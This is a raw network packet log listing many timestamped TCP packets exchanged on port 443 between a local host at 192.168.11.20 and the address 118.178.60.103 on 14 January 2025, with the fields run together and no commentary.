                                                                        Jan 14, 2025 05:16:08.256222010 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.256344080 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.256402016 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.256583929 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.259181976 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.259347916 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.259532928 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.262254000 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.262382984 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.262442112 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.262619019 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.267941952 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.268205881 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.270791054 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.270975113 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.271150112 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.276933908 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.277085066 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.277266979 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.279620886 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.279788971 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.279788971 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.282752991 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.282948017 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.283128977 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.288400888 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.288603067 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.288655043 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.291766882 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.291892052 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.291970015 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.297354937 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.297547102 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.297600985 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.300101995 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.300247908 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.300342083 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.303510904 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.303703070 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.308998108 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.309192896 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.309374094 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.312215090 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.312463999 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.317825079 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.317970991 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.318048000 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.320713997 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.321075916 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.321075916 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.326606989 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.326821089 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.327004910 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.329507113 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.329642057 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.329642057 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.332458019 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.332623959 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.332803011 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.338346004 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.338471889 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.338711023 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.341888905 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.342086077 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.342238903 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.347162962 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.347379923 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.350181103 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.350328922 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.350419044 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.353055000 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.353200912 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.353291988 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.358455896 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.358673096 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.361418009 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.361641884 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.366821051 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.366991043 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.367120981 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.369548082 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.369708061 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.369764090 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.372045040 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.372172117 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.372411013 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.377197981 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.377310991 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.377363920 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.377543926 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.379972935 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.380125046 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.380214930 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.384602070 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.384740114 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.384870052 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.387125969 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.387274981 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.387456894 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.389822960 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.389964104 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.389964104 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.390254021 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.394567013 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.394750118 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.394804001 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.399090052 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.399312973 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.399492979 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.401634932 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.401860952 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.403783083 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.403990030 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.408430099 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.408608913 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.408608913 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.410876989 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.411091089 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.411273003 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.415173054 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.415313005 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.415458918 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.417654991 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.417809963 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.417809963 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.419944048 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.420139074 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.420203924 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.424197912 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.424552917 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.424552917 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.426811934 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.426934958 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.427016973 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.430923939 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.431154013 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.433408976 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.433633089 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.433814049 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.435816050 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.436012983 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.439974070 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.440120935 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.440120935 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.444545984 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.444797993 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.446686029 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.446881056 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.446959019 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.449306965 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.449503899 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.453567028 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.453758955 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.455785036 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.455961943 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.460242987 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.460804939 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.462543011 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.462696075 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.462696075 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.462934971 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.465097904 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.465250015 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.465250015 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.469527960 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.469741106 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.471754074 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.471893072 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.471954107 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.476125956 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.476326942 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.478452921 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.478601933 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.478692055 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.480964899 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.481137037 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.481200933 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.485074997 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.485284090 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.485460997 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.487498999 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.487680912 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.491806984 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.491986036 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.494259119 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.494488001 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.494544029 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.496663094 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.496840000 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.497020960 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.500844002 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.501075983 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.501257896 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.503180981 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.503402948 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.503587008 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.507652998 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.507807970 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.507992983 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.514386892 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.514703989 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.517378092 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.517628908 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.518873930 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.519073963 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.519254923 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.520793915 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.521075010 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.523771048 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.523967028 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.524147987 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.525358915 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.525583982 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.528146982 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.528326988 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.529814959 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.529964924 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.530019999 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.531481028 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.531655073 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.531713009 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.534591913 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.534878969 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.536289930 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.536490917 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.539005995 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.539196968 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.539381027 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.540666103 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.540807962 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.540807962 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.541045904 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.542413950 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.542596102 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.542781115 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.545388937 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.545634985 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.548197031 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.548358917 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.548659086 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.549705029 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.550069094 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.551915884 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.552092075 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.552092075 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.554321051 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.554522038 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.554703951 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.556145906 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.556329966 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.556395054 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.558955908 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.559283018 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.560650110 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.560832024 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.560832024 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.562191963 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.562375069 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.562375069 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.565167904 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.565418005 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.566808939 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.567003012 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.567183971 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.569561958 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.569681883 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.569739103 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.571294069 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.571436882 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.571436882 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.572999954 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.573230028 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.573410988 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.575721025 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.575920105 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.578650951 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.578911066 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.579092026 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.580292940 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.580446005 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.580446005 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.581875086 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.582082987 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.584650993 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.584825993 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.584825993 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.585004091 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.586189032 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.586359978 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.586503029 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.589189053 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.589399099 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.589456081 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.590935946 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.591078997 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.591320038 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.592494011 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.592724085 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.595380068 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.595695019 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.596658945 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.596810102 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.596810102 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.600086927 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.600270033 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.600320101 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.601325989 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.601687908 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.602871895 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.603055000 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.605755091 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.605938911 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.607369900 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.607601881 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.607781887 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.610291004 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.610461950 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.610527039 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.611581087 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.611763000 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.613363981 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.613528013 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.613528013 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.616657019 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.616832972 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.617710114 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.617887974 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.620625973 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.620902061 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.622100115 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.622332096 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.622509956 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.625133991 CET44349770118.178.60.103192.168.11.20
